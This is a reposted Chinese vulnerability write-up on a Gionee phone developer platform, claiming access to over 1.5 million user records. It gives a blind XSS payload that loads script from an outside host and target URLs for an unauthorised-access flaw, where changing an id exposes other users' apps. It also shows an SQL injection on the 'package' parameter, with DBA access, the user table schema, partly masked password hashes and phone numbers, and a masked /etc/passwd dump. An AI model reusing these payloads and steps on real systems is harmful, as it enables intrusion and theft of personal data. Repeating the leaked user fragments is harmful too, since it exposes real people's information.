金立手机某处未授权访问&注入&xss盲打(150W+用户信息)企业安全分享!-计算机技术网

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

金立开发者平台

 https://dev.anzhuoapk.com/

1、xss盲打

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

payload

 '"><script src=https://t.cn/></script>

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

2、未授权访问

 https://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5961&package=com.bccv.meitu&act=business

更换id接口访问他人提交的app

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

3、注射

 https://ht.myaora.net:82/dvp_app_shoufa_edit.php?id=5967&package=com.bccv.meitu&act=business

参数package

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

current user is DBA: True

 Database: aorausermanagerdb Table: aouserlist [22 columns] +---------------+--------------------------+ | Column        | Type                     | +---------------+--------------------------+ | CityId        | int(11)                  | | CityName      | varchar(100)             | | CpId          | int(11)                  | | CreateTime    | datetime                 | | grade         | int(1) unsigned zerofill | | HashKey       | varchar(50)              | | Id            | int(11)                  | | Imei          | varchar(50)              | | Imsi          | varchar(50)              | | LastLoginTime | datetime                 | | LoginName     | varchar(50)              | | LoginNum      | int(1)                   | | LogMsg        | varchar(2000)            | | LostLoginImei | varchar(50)              | | Model         | varchar(200)             | | Phone         | varchar(50)              | | ProvinceName  | varchar(50)              | | RegSource     | varchar(50)              | | Remark        | varchar(200)             | | State         | int(11)                  | | UserName      | varchar(50)              | | UserPsw       | varchar(100)             | +---------------+--------------------------+

dump一部分

mask 区域

 *****auserma***** *****userl***** *****ntr***** *****------------+----------***** *****            | Phone    ***** *****------------+----------***** *****e8769a54aba | NULL     ***** *****626a9348  | *****0fbf9ddde90 | 135648855***** *****33dc6f99a35 | NULL     ***** *****eb1e22fd  | *****cf7a24c411b | 123741212***** *****a504545760e | 130066549***** *****da528c3f0e  | 127207045***** *****8efc1a8a  | *****48b67f151 | *****253a4ab495a | 123456789***** *****ede3617b  | *****7a9943661   | NULL     ***** *****64efc63859  | 123456789***** *****ba1fdcb89f  | 159866419***** *****5daa04bc  | *****5b6471893a  | NULL     ***** *****0a2761444 | *****ed610a7e0 | *****695da5c6a6ede64a  | 13265***** *****4bf90a77  | *****6505345ec | *****1ff0f2741b2edfe | 1867555***** *****d8e52e8b0b143a  | 1368526***** *****be9243c9d | *****9fc6ae316 | *****8defaf4fd92 | 138222992***** *****735ee357c2  | 158896035***** *****051e66ec0b  | 100000000***** *****3d4eb47ad | *****610c7708090dcaa547b   | 159***** *****a88149af47871a3b  | 13006***** *****072c6504e1  | 156228279***** *****7eed7a34adc7b | 1398521***** *****a405736b28a57 | *****2352e7e014  | 152364897***** *****343c3bc6cf  | 158285090***** *****bcbff374ab  | 134133677***** *****bf681fa509  | 139886286***** *****5cb8b42717  | NULL     ***** *****53a6471cdc5 | NULL     ***** *****45ce517755  | 139131615***** *****8a7a658f  | *****6ed5a75963d | NULL     ***** *****fd46446ad5e | NULL     ***** *****b6f6c3acbdc | NULL     ***** *****6e895f65d3a | NULL     ***** *****a5347e7620ce  | 1591413***** *****ffcc8351  | *****41369f0f878 | NULL     ***** *****31364868f1d | NULL     ***** *****d76c489f  | *****addd564   | *****70fe5656f   | NULL     ***** *****d2a2440   | *****55a5e51467c | NULL     ***** *****afbfd7d3e66 | NULL     ***** *****7c64492286  | NULL     ***** *****d1170169df  | NULL     ***** *****f09207d7de9 | 132123412***** *****2d6b4667a8c | NULL     ***** *****98c7e3f66d  | NULL     ***** *****06f5932c46  | NULL     ***** *****5cc990ae  | *****92fa79a3696 | 135105177***** *****1a299caf  | *****5b00156ca4  | NULL     ***** *****4970dcd5917 | NULL     ***** *****e3e6307843c2254a  | 15112***** *****342986c31e9 | NULL     ***** *****045162872 | *****e7abc675  | *****e5db8b4de | *****7e7a8c    | *****e23eaa84d32 | NULL     ***** *****e9704f7ab3  | NULL     ***** *****8e02bc6710  | NULL     ***** *****4cbea84ce | *****c20e46f98d3 | *****1f9d6544  | *****1261db3c  | *****f81fecc1203 | NULL     ***** *****5ccb2bd1cf4 | NULL     ***** *****68af933fab  | 131470084***** *****0d69425b  | *****b79aca48cc  | NULL     ***** *****7b074108b7  | NULL     ***** *****5f54385aa03 | NULL     ***** *****c38cafe919  | NULL     ***** *****9dd233490d9 | NULL     ***** *****d8c1e6f5abf | NULL     ***** *****e7ef10b184  | NULL     ***** *****731738b4b8  | NULL     ***** *****3cebda1f20  | NULL     ***** *****------------+----------*****

mask 区域

 *****:/root:/***** *****bin:/sbi***** *****:/sbin:/sb***** *****r/adm:/sb***** *****ool/lpd:/s***** *****:/sbin:/***** *****wn:/sbin:/s***** *****:/sbin:/***** *****/spool/mail***** *****ews:/et***** *****spool/uucp:/***** *****tor:/root:/***** *****/usr/games:***** *****var/gopher:/***** *****/var/ftp:/s***** *****body:/:/s***** *****aemon:/:/s***** *****tcache:/:/s***** *****memory owner:/d***** *****arpwatch:/***** *****:/var/www:/***** *****RPC user:/:/***** *****spool/mqueue***** *****pool/mqueue***** *****:/var/www/usag***** *****pool/squid:***** *****/ntp:/sbi***** *****lib/hsqldb:***** ***** User:/var/lib***** *****nymous NFS User:/va***** *****var/named:/***** *****er:/etc/X11/***** *****d SSH:/var/empty***** *****sage bus:/:/***** ***** daemon:/:***** ***** daemon:/:/***** *****pd:/var/lib/avahi-***** *****/gdm:/sbi***** *****/home/mys***** *****home/nagio***** *****eartbeat/cores/h***** *****/home/lil*****

配置文件读不了。找不到网站路径。。

—-想了解更多的企业安全相关处理怎么解决关注<计算机技术网(www.ctvol.com)!!>

本文来自网络收集，不代表计算机技术网立场，如涉及侵权请联系管理员删除。

ctvol管理联系方式QQ:251552304

本文章地址：https://www.ctvol.com/webstt/esecurity/99718.html

金立手机某处未授权访问&amp;注入&amp;xss盲打(150W+用户信息)企业安全分享!

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)

精彩推荐

金立手机某处未授权访问&注入&xss盲打(150W+用户信息)企业安全分享!